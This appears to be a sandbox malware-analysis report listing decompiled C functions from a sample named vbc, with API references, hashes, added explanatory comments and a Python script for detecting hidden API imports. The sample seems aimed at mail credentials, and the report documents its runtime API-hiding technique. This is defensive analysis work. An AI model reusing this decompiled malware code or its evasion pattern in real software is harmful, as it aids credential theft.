• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004073AC
Strings
• Software\Google\Google Desktop\Mailboxes, xrefs: 00407319
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Close$EnumOpenmemset
• String ID: Software\Google\Google Desktop\Mailboxes
• API String ID: 2255314230-2212045309
• Opcode ID: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
• Instruction ID: e64120c2db1572d8afbfe90730df88552d052729858ffd3f9c459fe70d1883dc
• Opcode Fuzzy Hash: 9ab75551773aed32ac14d672ca6fc6d16b8ba2b7fe8e99e73c669c0c868d9bd0
• Instruction Fuzzy Hash: FE114F72808345BBD720EA52DC02EAB7BECEB84344F04493EBD94D1191E735DA1CDAA7
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040AECD(void* __ebx, void* __eflags) {
	char _v265;
	char _v526;
	char _v787;
	void _v1048;
	void _v3648;
	intOrPtr _v3652;
	char _v3660;
	void* _t30;

	_t30 = __ebx;
	_v3660 = 0x414040;
	memset( &_v3648, 0, 0x10);
	_v1048 = 0;
	_v787 = 0;
	_v526 = 0;
	_v265 = 0;
	_v3652 = 0x6c;
	memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
	_t12 =  &_v3660; // 0x414040
	if(E00401540(_t12,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
		E0040AEB7(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
	}
	SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
	_t18 =  &_v3660; // 0x414040
	return E004013E7(_t18);
}

APIs
• memset.MSVCRT ref: 0040AEED
• SetFocus.USER32(?,?), ref: 0040AF75
  • Part of subcall function 0040AEB7: PostMessageA.USER32 ref: 0040AEC6
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FocusMessagePostmemset
• String ID: @@A$l
• API String ID: 3436799508-3245464651
• Opcode ID: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
• Instruction ID: b134d5c547a061a2024b59ce6a2071751047cb74c3ab3f5c012b8dbc43773ba7
• Opcode Fuzzy Hash: caeb76f4659ab955c907a99837df0e7903f88894a94faa412a12e2d9c7c3a8b3
• Instruction Fuzzy Hash: E511A5719001588BDF21DB15CD457CB7BA9AF40308F0800F5A94C7B282C7B55A89CFA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004085AB(void** __esi, struct HWND__* _a4) {
	long _v12;
	signed int _v24;
	signed int _v28;
	short _v32;
	void* _v40;
	long _t17;
	short* _t23;
	int _t24;
	void** _t25;

	_t25 = __esi;
	_t24 = 0;
	if(_a4 != 0) {
		_t17 = memset( *__esi, 0, __esi[1] << 2);
		if(__esi[1] > 0) {
			do {
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_t23 =  *_t25 + _t24 * 4;
				_v40 = 0x22;
				_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
				if(_t17 != 0) {
					 *_t23 = _v32;
					_t17 = _v12;
					 *(_t23 + 2) = _t17;
				}
				_t24 = _t24 + 1;
			} while (_t24 < _t25[1]);
		}
	}
	return _t17;
}

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004085C4
                                                                                                                                                                        • SendMessageA.USER32(?,00001019,00000000,?), ref: 004085F2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendmemset
                                                                                                                                                                        • String ID: "$\LA
                                                                                                                                                                        • API String ID: 568519121-1791104459
                                                                                                                                                                        • Opcode ID: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
                                                                                                                                                                        • Instruction ID: 63acc278c780c6314b896fe9ea96fe6fcbd724764764ef8c6808a121558323c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 26f90e38fa5412fa5d9144848af1d9542bec1eb57a3646f7dcddd4dc696a0724
                                                                                                                                                                        • Instruction Fuzzy Hash: 6401D635900204AFDB20DF45CA81AABB7F8FF84749F11842EE891A7241E7359E95CB79
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00406647(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				char* _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                                        				struct tagOFNA _v80;
                                                                                                                                                                        
                                                                                                                                                                        				_v76 = __eax;
                                                                                                                                                                        				_v68 = _a4;
                                                                                                                                                                        				_v64 = 0;
                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                        				_v32 = _a8;
                                                                                                                                                                        				_v80 = 0x4c;
                                                                                                                                                                        				_v56 = 1;
                                                                                                                                                                        				_v52 = __esi;
                                                                                                                                                                        				_v48 = 0x104;
                                                                                                                                                                        				_v28 = 0x81804;
                                                                                                                                                                        				_v20 = 0x41403c;
                                                                                                                                                                        				if(GetOpenFileNameA( &_v80) == 0) {
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					strcpy(__esi, _v52);
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

                                                                                                                                                                        0x0040664d
                                                                                                                                                                        0x00406653
                                                                                                                                                                        0x00406658
                                                                                                                                                                        0x0040665b
                                                                                                                                                                        0x0040665e
                                                                                                                                                                        0x00406664
                                                                                                                                                                        0x0040666b
                                                                                                                                                                        0x00406672
                                                                                                                                                                        0x00406679
                                                                                                                                                                        0x0040667c
                                                                                                                                                                        0x00406683
                                                                                                                                                                        0x0040668a
                                                                                                                                                                        0x00406699
                                                                                                                                                                        0x004066ae
                                                                                                                                                                        0x0040669b
                                                                                                                                                                        0x0040669f
                                                                                                                                                                        0x004066aa
                                                                                                                                                                        0x004066aa

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileNameOpenstrcpy
                                                                                                                                                                        • String ID: L$ini
                                                                                                                                                                        • API String ID: 812585365-4234614086
                                                                                                                                                                        • Opcode ID: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
                                                                                                                                                                        • Instruction ID: 37832acc40b05216fd1420d9404962ea4abb69311e967ef4bad7b399ffdc39fa
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e8797fdf618d39e3eb3ab1232a77db25cc5d7ab3626c4b171bcbec14203ab80
                                                                                                                                                                        • Instruction Fuzzy Hash: 9001BDB1D102189FCF50DFA9D9456CEBFF8BB08348F00812AE519E6240EBB885458F98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00401000(void* __esi, void* __eflags) {
                                                                                                                                                                        				struct tagLOGFONTA _v64;
                                                                                                                                                                        				int _t10;
                                                                                                                                                                        				long _t11;
                                                                                                                                                                        
                                                                                                                                                                        				E0040619B( &_v64, "MS Sans Serif", 0xa, 1);
                                                                                                                                                                        				_t10 = CreateFontIndirectA( &_v64);
                                                                                                                                                                        				 *(__esi + 0x20c) = _t10;
                                                                                                                                                                        				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
                                                                                                                                                                        				if( *0x418388 != 0) {
                                                                                                                                                                        					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t11;
                                                                                                                                                                        			}

                                                                                                                                                                        0x00401013
                                                                                                                                                                        0x0040101f
                                                                                                                                                                        0x00401038
                                                                                                                                                                        0x0040103e
                                                                                                                                                                        0x00401047
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040105b
                                                                                                                                                                        0x0040105f

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
                                                                                                                                                                          • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
                                                                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                                                                                                                        • String ID: MS Sans Serif
                                                                                                                                                                        • API String ID: 4251605573-168460110
                                                                                                                                                                        • Opcode ID: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
                                                                                                                                                                        • Instruction ID: 87dec32cde48cbcf1a13d2850fc5ac8412a7d38377e852ebd334ba5dd6d4256f
                                                                                                                                                                        • Opcode Fuzzy Hash: 7584cd5e44123684fe29065303b056f6d65f03dbfdfa9ec3df9736e2aa6a92dd
                                                                                                                                                                        • Instruction Fuzzy Hash: 0DF0A771B4030877EB216BA0EC4BF8A7BACAB41F01F148535FA51B51E1D6F5B644CB48
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E004062DB(struct HWND__* _a4) {
                                                                                                                                                                        				void _v259;
                                                                                                                                                                        				char _v260;
                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                        
                                                                                                                                                                        				_v260 = 0;
                                                                                                                                                                        				memset( &_v259, 0, 0xff);
                                                                                                                                                                        				GetClassNameA(_a4,  &_v260, 0xff);
                                                                                                                                                                        				_t10 =  &_v260;
                                                                                                                                                                        				_push("edit");
                                                                                                                                                                        				_push(_t10);
                                                                                                                                                                        				L00412072();
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				return  ~_t10 + 1;
                                                                                                                                                                        			}






Instruction addresses (one per decompiled statement): 0x004062f4 0x004062fb 0x0040630e 0x00406314 0x0040631a 0x0040631f 0x00406320 0x00406329 0x0040632e

APIs
• memset.MSVCRT ref: 004062FB
• GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
• _stricmp.MSVCRT(00000000,edit), ref: 00406320
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ClassName_stricmpmemset
• String ID: edit
• API String ID: 3665161774-2167791130
• Opcode ID: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
• Instruction ID: f5117061f2ecbf32e0f2d844d8c4f3ebb38ffa703039f8d1d2413de036cb48d9
• Opcode Fuzzy Hash: 6e637e9eddf622f627d70554f5007a36f01acadd3667ac6aea8fad4d2d9c4dd7
• Instruction Fuzzy Hash: 6BE09B72C4412A7EDB21A664EC01FE63BAC9F19705F0001B6B945E1081E6A497C48AA4
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040F41D() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				/* lazy API resolver: the global at 0x418520 caches the shell32.dll module handle and
				   the global at 0x41851c the resolved SHGetSpecialFolderPathA pointer, so neither name
				   has to appear in the import table; both survive only as string literals */
				if( *0x418520 == 0) {
					_t1 = LoadLibraryA("shell32.dll");
					 *0x418520 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
						 *0x41851c = _t2;
						return _t2;                       /* 0 if the export could not be resolved */
					}
				}
				return _t1;                               /* on a repeat call (module already cached) _t1 is never assigned in this
				                                             routine, so callers must read the cached pointer at 0x41851c rather than
				                                             rely on this return value */
			}





Instruction addresses (one per decompiled statement): 0x0040f424 0x0040f42b 0x0040f433 0x0040f438 0x0040f440 0x0040f446 0x00000000 0x0040f446 0x0040f438 0x0040f44b

APIs
• LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,73B74DE0,?,00000000), ref: 0040F42B
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: SHGetSpecialFolderPathA$shell32.dll
• API String ID: 2574300362-543337301
• Opcode ID: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
• Instruction ID: f6b0fe8b92f076911ecc5568a6e4330759afce426f86003319557fe493e3cfe8
• Opcode Fuzzy Hash: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
• Instruction Fuzzy Hash: 59D092B0642202ABD7208F21AC097827AAAE798706F01C53AA800E12A4FF7895448A5D
Uniqueness
• Uniqueness Score: -1.00%
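The resolver in E0040F41D keeps shell32.dll and SHGetSpecialFolderPathA out of the import table, which is why the report can record them only as a string ID. The triage helper below is an added example, not part of the Joe Sandbox report or of the sample: it recovers such hidden API references from a memory dump by extracting NUL-terminated ASCII strings and pairing each DLL-name string with any Win32-style API-name string that sits within a few hundred bytes of it, which is how such literals typically cluster in .rdata. The byte blob it runs on is constructed inline to mimic the dump above; the 512-byte proximity window, the CamelCase API-name heuristic and the decision to exclude LoadLibraryA/GetProcAddress themselves from the candidate list are assumptions of this example.

```python
import re
from dataclasses import dataclass

# NUL-terminated runs of at least 4 printable ASCII characters: the shape of
# literals passed to LoadLibraryA / GetProcAddress in 32-bit x86 code.
ASCII_STRING = re.compile(rb"[\x20-\x7e]{4,}\x00")
DLL_NAME = re.compile(r"^[A-Za-z0-9_]+\.dll$", re.IGNORECASE)
# Win32 exports are CamelCase (often with an A/W suffix); purely lowercase
# words such as the window class "edit" are rejected by the leading [A-Z].
API_NAME = re.compile(r"^(?=.*[a-z])[A-Z][A-Za-z0-9]{3,}$")
# Assumed: these are the imports the resolver itself needs, not its targets.
RESOLVER_PRIMITIVES = {"LoadLibraryA", "GetProcAddress"}
WINDOW = 512  # assumed maximum distance (bytes) between a DLL name and its API name


@dataclass(frozen=True)
class DynamicApiRef:
    dll: str
    api: str
    dll_offset: int
    api_offset: int


def extract_strings(blob: bytes):
    """Yield (offset, text) for every NUL-terminated printable ASCII string."""
    for m in ASCII_STRING.finditer(blob):
        yield m.start(), m.group()[:-1].decode("ascii")


def find_dynamic_api_refs(blob: bytes, window: int = WINDOW):
    """Pair DLL-name strings with nearby API-name strings.

    Each pair is a candidate GetProcAddress target that the import table
    will not show. Results are sorted by the DLL string's offset."""
    strings = list(extract_strings(blob))
    dlls = [(off, s) for off, s in strings if DLL_NAME.match(s)]
    apis = [(off, s) for off, s in strings
            if API_NAME.match(s) and s not in RESOLVER_PRIMITIVES]
    refs = [
        DynamicApiRef(dll.lower(), api, d_off, a_off)
        for d_off, dll in dlls
        for a_off, api in apis
        if abs(a_off - d_off) <= window
    ]
    return sorted(refs, key=lambda r: (r.dll_offset, r.api_offset))


def has_resolver_primitives(blob: bytes) -> bool:
    """True if both names the lazy-resolver pattern depends on are present.

    A binary whose import table holds little beyond these two is worth
    a closer look, because its real capabilities are resolved at runtime."""
    return b"LoadLibraryA\x00" in blob and b"GetProcAddress\x00" in blob


# Constructed sample: a fake read-only data region laid out like the dump above.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b"SHGetSpecialFolderPathA\x00"       # API name at offset 32
    + b"shell32.dll\x00"                   # DLL name at offset 56
    + b"edit\x00"                          # window class, not an API name
    + b"\x90" * 100                        # non-printable filler
    + b"LoadLibraryA\x00GetProcAddress\x00"
    + b"\x00" * 2000
    + b"kernel32.dll\x00"                  # too far from any API name to pair
)

if __name__ == "__main__":
    for ref in find_dynamic_api_refs(SAMPLE_DUMP):
        print(f"{ref.dll} -> {ref.api} (dll@{ref.dll_offset:#x}, api@{ref.api_offset:#x})")
```

Run it against a raw memory dump (for example the .sdmp referenced in the Memory Dump Source block) by reading the file into `find_dynamic_api_refs`; unpaired API-like strings and DLL names further apart than the window are not reported, so widen `WINDOW` if the sample stores its string tables in separate sections.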

C-Code - Quality: 87%
			E004104AE(intOrPtr* __esi, void* __eflags) {
				void* _t27;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t44;

				/* constructor-style routine for the object in esi: it writes a vtable-like pointer at
				   offset 0, then fills +0x450..+0x460 with five heap-allocated sub-objects.
				   L00412090 is called with a pushed size (0x20 or 0x14) and its result is null-checked,
				   which is consistent with operator new / malloc (inferred from usage; the report does
				   not name the thunk). The decompiler renders each allocation as _push(size);
				   L00412090(); and the comparison that follows tests the allocator's return value. */
				_t44 = __esi;
				 *__esi = 0x415314;
				_t27 = E00406578(0x46c, __esi);               /* 0x46c is consistent with the object size: the last field written is +0x460 */
				_push(0x20);
				L00412090();                                   /* alloc 0x20 -> _t27 */
				if(_t27 == 0) {
					_t28 = 0;
				} else {
					_t28 = E00406A5B(_t27);                    /* initialise the 0x20-byte sub-object */
				}
				_push(0x20);
				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
				L00412090();                                   /* alloc 0x20 -> _t28 */
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t29 = E00406A5B(_t28);
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
				L00412090();                                   /* alloc 0x14 -> _t29; the three 0x14-byte records that follow are zeroed
				                                                  except for 0x100 at +0x10, a capacity-like field (inferred) */
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
				L00412090();                                   /* alloc 0x14 -> _t29 */
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
				L00412090();                                   /* alloc 0x14 -> _t29 */
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;   /* dereferenced without a null check: a failed allocation above would fault here */
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
				 *((intOrPtr*)(_t44 + 0x3c)) = 1;              /* four flag fields at +0x3c..+0x48 set to 1 */
				 *((intOrPtr*)(_t44 + 0x40)) = 1;
				 *((intOrPtr*)(_t44 + 0x44)) = 1;
				 *((intOrPtr*)(_t44 + 0x48)) = 1;
				return _t44;                                   /* returns the constructed object (this) */
			}







Instruction addresses (one per decompiled statement, in listing order): 0x004104ae 0x004104b6 0x004104bc 0x004104c1 0x004104c3 0x004104ce 0x004104d7 0x004104d0 0x004104d0 0x004104d0 0x004104d9 0x004104db 0x004104e1 0x004104e9 0x004104f2 0x004104eb 0x004104eb 0x004104eb 0x004104f4 0x004104f6 0x004104fc 0x00410509 0x0041051b 0x0041050b 0x0041050b 0x0041050e 0x00410510 0x00410513 0x00410516 0x00410516
                                                                                                                                                                        0x0041051d
                                                                                                                                                                        0x0041051f
                                                                                                                                                                        0x00410525
                                                                                                                                                                        0x0041052d
                                                                                                                                                                        0x0041053f
                                                                                                                                                                        0x0041052f
                                                                                                                                                                        0x0041052f
                                                                                                                                                                        0x00410532
                                                                                                                                                                        0x00410534
                                                                                                                                                                        0x00410537
                                                                                                                                                                        0x0041053a
                                                                                                                                                                        0x0041053a
                                                                                                                                                                        0x00410541
                                                                                                                                                                        0x00410543
                                                                                                                                                                        0x00410549
                                                                                                                                                                        0x00410551
                                                                                                                                                                        0x00410563
                                                                                                                                                                        0x00410553
                                                                                                                                                                        0x00410553
                                                                                                                                                                        0x00410556
                                                                                                                                                                        0x00410558
                                                                                                                                                                        0x0041055b
                                                                                                                                                                        0x0041055e
                                                                                                                                                                        0x0041055e
                                                                                                                                                                        0x0041056b
                                                                                                                                                                        0x00410576
                                                                                                                                                                        0x0041057f
                                                                                                                                                                        0x00410586
                                                                                                                                                                        0x00410589
                                                                                                                                                                        0x0041058c
                                                                                                                                                                        0x0041058f
                                                                                                                                                                        0x00410595

APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
• Opcode ID: 7bad43f24cb77abe56b588b58120f20ee9b42d559bc282368106ea24cb956e28
• Instruction ID: e5f264b8724d3d475e9e13978f0762699e8b6218914c988ba7d238899ccfa6da
• Opcode Fuzzy Hash: 7bad43f24cb77abe56b588b58120f20ee9b42d559bc282368106ea24cb956e28
• Instruction Fuzzy Hash: 2431E8B0A007009FD750DF3A99856A6FBE5EF84305B25886FD25ACB262D7B8D481CF19
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 93%
E004065B4(char* __edi, intOrPtr _a4, signed int _a8) {
	void _v259;
	char _v260;
	char* _t34;
	signed int _t35;
	void* _t36;
	void* _t37;

	_t34 = __edi;
	_v260 = 0;
	memset( &_v259, 0, 0xfe);
	_t37 = _t36 + 0xc;
	 *__edi = 0;
	_t35 = 0;
	do {
		sprintf( &_v260, 0x413470,  *(_t35 + _a4) & 0x000000ff);
		_t37 = _t37 + 0xc;
		if(_t35 > 0) {
			strcat(_t34, " ");
		}
		if(_a8 > 0) {
			asm("cdq");
			if(_t35 % _a8 == 0) {
				strcat(_t34, "  ");
			}
		}
		strcat(_t34,  &_v260);
		_t35 = _t35 + 1;
	} while (_t35 < 0x80);
	return _t34;
}
Instruction addresses:
0x004065b4 0x004065cc 0x004065d3 0x004065d8 0x004065db 0x004065de 0x004065e0 0x004065f4
0x004065f9 0x004065fe 0x00406606 0x0040660c 0x00406611 0x00406615 0x0040661b 0x00406623
0x00406629 0x0040661b 0x00406632 0x00406637 0x0040663f 0x00406646

APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strcat$memsetsprintf
• String ID:
• API String ID: 582077193-0
• Opcode ID: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
• Instruction ID: 9a6b28ef774d6e53ee32a9c0eecf57d77903bda120735f9d6ade06843e2f5b66
• Opcode Fuzzy Hash: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
• Instruction Fuzzy Hash: 03014C32A042152AD73266569C02BEB3B9C9B58708F10817FF944E51C2EAFCD6D4879D
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040BEEC(void* __edi, void* __esi, void* _a4) {
	signed int _t13;
	signed int _t25;
	int _t26;
	char* _t30;
	void* _t31;
	void* _t33;
	void* _t35;

	_t35 = __esi;
	_t25 = 0x3f;
	_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
	_t30 = __esi + 0x18 + _t13;
	 *_t30 = 0x80;
	_t26 = _t25 - _t13;
	_t31 = _t30 + 1;
	if(_t26 >= 8) {
		memset(_t31, 0, _t26 + 0xfffffff8);
	} else {
		memset(_t31, 0, _t26);
		_t33 = __esi + 0x18;
		E0040BF6B(_t33, __esi);
		memset(_t33, 0, 0x38);
	}
	 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
	 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
	E0040BF6B(_t35 + 0x18, _t35);
	memcpy(_a4, _t35, 0x10);
	return memset(_t35, 0, 4);
}
Instruction addresses:
0x0040beec 0x0040bef4 0x0040bef5 0x0040bef7 0x0040befb 0x0040befe 0x0040bf00 0x0040bf04
0x0040bf33 0x0040bf06 0x0040bf0b 0x0040bf10 0x0040bf17 0x0040bf21 0x0040bf29 0x0040bf3e
0x0040bf44
                                                                                                                                                                        0x0040bf4c
                                                                                                                                                                        0x0040bf58
                                                                                                                                                                        0x0040bf6a

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                                                        • Opcode ID: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
                                                                                                                                                                        • Instruction ID: 1bd4811e219587db2c743c544c50c2778389369fcaa1acc1f1d0acac3f9f4604
                                                                                                                                                                        • Opcode Fuzzy Hash: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
                                                                                                                                                                        • Instruction Fuzzy Hash: D90128B1650B002BD235AB35CD03F6B77A4EB54B14F000B1EF642E66D3D7A8A14489AD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040242B(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
                                                                                                                                                                        				void _v2058;
                                                                                                                                                                        				char _v2060;
                                                                                                                                                                        				char _v2069;
                                                                                                                                                                        				char _v2070;
                                                                                                                                                                        				char _v2071;
                                                                                                                                                                        				char _v2072;
                                                                                                                                                                        				char _v3086;
                                                                                                                                                                        				signed char _v3090;
